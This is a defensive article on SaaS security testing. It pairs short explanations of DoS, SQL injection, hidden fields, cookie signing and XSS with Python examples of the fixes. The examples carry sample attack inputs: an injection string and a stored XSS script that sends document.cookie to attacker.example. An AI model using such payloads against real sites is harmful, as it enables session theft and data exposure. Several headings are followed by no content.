Securing the cloud-based apps
Organizations consume cloud services in several forms (SaaS, PaaS, IaaS) and under private, public, or hybrid deployment models, and the applications hosted on each of them need security just as much as on-premises ones. Cloud computing security, or simply cloud security, covers network, data, and application security in the cloud environment.
The most significant risk associated with cloud computing is data loss or exposure. Moving to the cloud is fast, but the business-level security policies, practices, and processes still have to be defined, implemented, and followed; skipping them is how severe data breaches happen.
Security challenges with SaaS:
Most organizations are adopting the latest cloud technologies, and with them comes a new set of security challenges:
Security testing for SaaS:
With the growth of cloud computing, security testers have to ensure the security of SaaS applications. Because a SaaS application is continuously updated and shared by many tenants, security testing has to be continuous and repeated at frequent intervals; one-time testing does not suffice.
Security testing of SaaS offerings should cover at least the following:
The major security checks performed for SaaS are:
Denial of Service (DOS):
A DoS attack occurs when an attacker brings down the deployment servers or network by flooding them with more traffic than they can absorb, often from many distributed or IP-spoofed sources (DDoS). No man-in-the-middle position is needed; volume alone does the damage. Mitigation relies on proper access and throttling mechanisms: per-client rate limiting at the edge, capacity headroom, and upstream traffic filtering. Security testing should include load tests that confirm the service degrades gracefully instead of collapsing.
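The per-client throttling mentioned above, as an added example that is not code from the original article: a token-bucket rate limiter that an API front end applies before doing expensive work. The capacity and refill rate are assumed values, and the clock is injectable so the behaviour can be checked without waiting.

```python
import time
from collections import defaultdict


class TokenBucket:
    """Allow up to `capacity` requests in a burst per client, then `rate` per second.

    Constructed example (not from the article). Each client gets its own bucket,
    so one flooding source cannot consume another client's allowance.
    """

    def __init__(self, capacity: int, rate: float, now=time.monotonic):
        self.capacity = capacity
        self.rate = rate
        self.now = now  # injectable clock, used by the tests below
        self.tokens = defaultdict(lambda: float(capacity))
        self.last = {}

    def allow(self, client_id: str) -> bool:
        t = self.now()
        last = self.last.get(client_id, t)
        # Refill proportionally to elapsed time, never beyond capacity.
        self.tokens[client_id] = min(
            self.capacity, self.tokens[client_id] + (t - last) * self.rate
        )
        self.last[client_id] = t
        if self.tokens[client_id] >= 1.0:
            self.tokens[client_id] -= 1.0
            return True
        return False


def simulate_flood(bucket: TokenBucket, client_id: str, requests: int) -> int:
    """Fire `requests` back-to-back calls for one client; return how many got through."""
    return sum(1 for _ in range(requests) if bucket.allow(client_id))


if __name__ == "__main__":
    bucket = TokenBucket(capacity=5, rate=1.0)
    print("accepted from flooding client:", simulate_flood(bucket, "10.0.0.1", 100))
    print("other client still served:", bucket.allow("10.0.0.2"))
```

In production the bucket state lives in a shared store (or the limiter runs in the load balancer) so that it applies across all application instances, and the key should be the authenticated tenant or user where available rather than only the source IP.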
SQL Injection:
Attackers inject crafted SQL through the application's input fields to read or modify sensitive data. The primary defence is parameterised (prepared) queries, so that input is bound as data and never parsed as SQL; input validation and a least-privilege database account add defence in depth but do not replace parameterisation.
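The difference between a string-built query and a parameterised one, as an added example that is not code from the original article. It uses an in-memory SQLite table with constructed rows; the table, column names and the `nobody' OR '1'='1` payload are assumptions for illustration.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, api_key TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "key-alice"), (2, "bob", "key-bob")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """String-built query: attacker-controlled input becomes SQL syntax."""
    sql = f"SELECT username, api_key FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the driver binds the value; quotes in it stay data."""
    sql = "SELECT username, api_key FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def valid_username(username: str) -> bool:
    """Allow-list validation as defence in depth (assumed username policy)."""
    return re.fullmatch(r"[a-z0-9_]{1,32}", username) is not None


PAYLOAD = "nobody' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lookup_vulnerable(conn, PAYLOAD))  # every user's key
    print("safe:      ", lookup_safe(conn, PAYLOAD))        # nothing
    print("validated: ", valid_username(PAYLOAD))           # False
```

The vulnerable variant turns the payload into `WHERE username = 'nobody' OR '1'='1'`, which matches every row; the parameterised variant looks for a user literally named `nobody' OR '1'='1` and finds none.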
Hidden Form Parameters:
Hidden form fields remain under the client's control: a user can read and rewrite them before submitting, so they are a threat to data integrity whenever the server trusts them. Avoid using them for anything security-relevant (prices, user or tenant IDs, roles); recompute such values on the server, or protect them with a server-side keyed signature so that tampering is detected.
Cookie Values:
Cookies are not protected by "encrypting" them with SHA or MD5: those are hash functions, not ciphers, and an unkeyed hash can be recomputed by anyone, so it gives neither confidentiality nor integrity (and MD5 is broken in any case). A session cookie should be an opaque random identifier, or, if it carries data, be authenticated with a keyed MAC such as HMAC-SHA256 and set with the Secure, HttpOnly and SameSite attributes. Cookies must also be tested manually (tampering, expiry, scope, attribute flags) in addition to automated vulnerability scanning.
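One server-side keyed signature that serves both of the previous points (hidden form values and cookie values), as an added example that is not code from the original article. `SECRET_KEY` is a constructed value that in a real deployment comes from a secret store; the `md5_tagged` helper shows why the unkeyed "MD5 encryption" the article mentioned does not detect tampering.

```python
import base64
import hashlib
import hmac

# Constructed secret for the example; real keys come from a secret store and
# are never sent to the client.
SECRET_KEY = b"server-side-secret-do-not-ship-to-clients"


def sign_value(value: str, key: bytes = SECRET_KEY) -> str:
    """Return value + '.' + base64url(HMAC-SHA256(key, value))."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(mac).decode().rstrip("=")


def verify_value(token: str, key: bytes = SECRET_KEY):
    """Return the original value if its tag verifies, else None."""
    value, sep, tag = token.rpartition(".")
    if not sep:
        return None
    expected = sign_value(value, key).rpartition(".")[2]
    # Constant-time comparison so a wrong tag is not revealed byte by byte.
    if not hmac.compare_digest(expected, tag):
        return None
    return value


def md5_tagged(value: str) -> str:
    """What 'protecting' a value with MD5 amounts to: anyone can recompute it."""
    return value + "." + hashlib.md5(value.encode()).hexdigest()


def verify_md5(token: str):
    """The matching check accepts any token the attacker built with md5_tagged."""
    value, _, tag = token.rpartition(".")
    return value if hashlib.md5(value.encode()).hexdigest() == tag else None


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line with the attributes a session cookie should carry."""
    return f"Set-Cookie: session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    token = sign_value("price=100")
    print("genuine  :", verify_value(token))
    forged = "price=1." + token.rpartition(".")[2]
    print("tampered :", verify_value(forged))          # None: rejected
    print("md5 forge:", verify_md5(md5_tagged("price=1")))  # accepted, which is the problem
    print(session_cookie_header("opaque-random-id"))
```

The HMAC tag can only be produced with the server's key, so rewriting the value (in a hidden field or a cookie) invalidates it, whereas the MD5 scheme lets the client mint a valid-looking tag for any value it likes. Signing protects integrity only; if the value must stay secret from the user, keep it server-side and send an opaque identifier instead.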
XSS:
Since a SaaS application is shared by many tenants, Cross-Site Scripting (XSS) is among the most damaging attacks against it: a stored payload entered by one user can execute in every other user's browser. Reflected XSS is typically delivered through phishing links, but stored XSS needs no phishing at all. The defence is context-appropriate output encoding of all user-supplied data plus a Content Security Policy; automated vulnerability scanning catches many reflected cases, but stored, cross-tenant XSS also needs manual testing with tenant-to-tenant scenarios.
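Output encoding for the stored, cross-tenant case, as an added example that is not code from the original article. The comment text is a constructed payload standing in for data one tenant saved that another tenant's browser will render; the CSP value is an assumed policy, not the article's.

```python
import html

# Constructed payload: stored by one tenant, rendered for every other one.
STORED_COMMENT = (
    'Great product! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)


def render_vulnerable(comment: str) -> str:
    """Interpolates raw user data into HTML: the script tag is executed."""
    return f"<li class='comment'>{comment}</li>"


def render_safe(comment: str) -> str:
    """Encodes for the HTML text context; the payload is displayed, not run.

    Attribute, JavaScript and URL contexts each need their own encoder; this
    one is only correct for element text.
    """
    return f"<li class='comment'>{html.escape(comment, quote=True)}</li>"


def security_headers() -> dict:
    """Response headers that limit damage if an encoding step is missed (assumed policy)."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENT))
    print(render_safe(STORED_COMMENT))
    for name, value in security_headers().items():
        print(f"{name}: {value}")
```

With the policy above, even an inline script that slips through an unencoded path is refused by the browser because `script-src 'self'` does not allow inline code. A scanner will usually find the reflected variant of this bug; the stored one only shows up if the tester submits the payload as one tenant and views the page as another.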
Best practices for SaaS Security: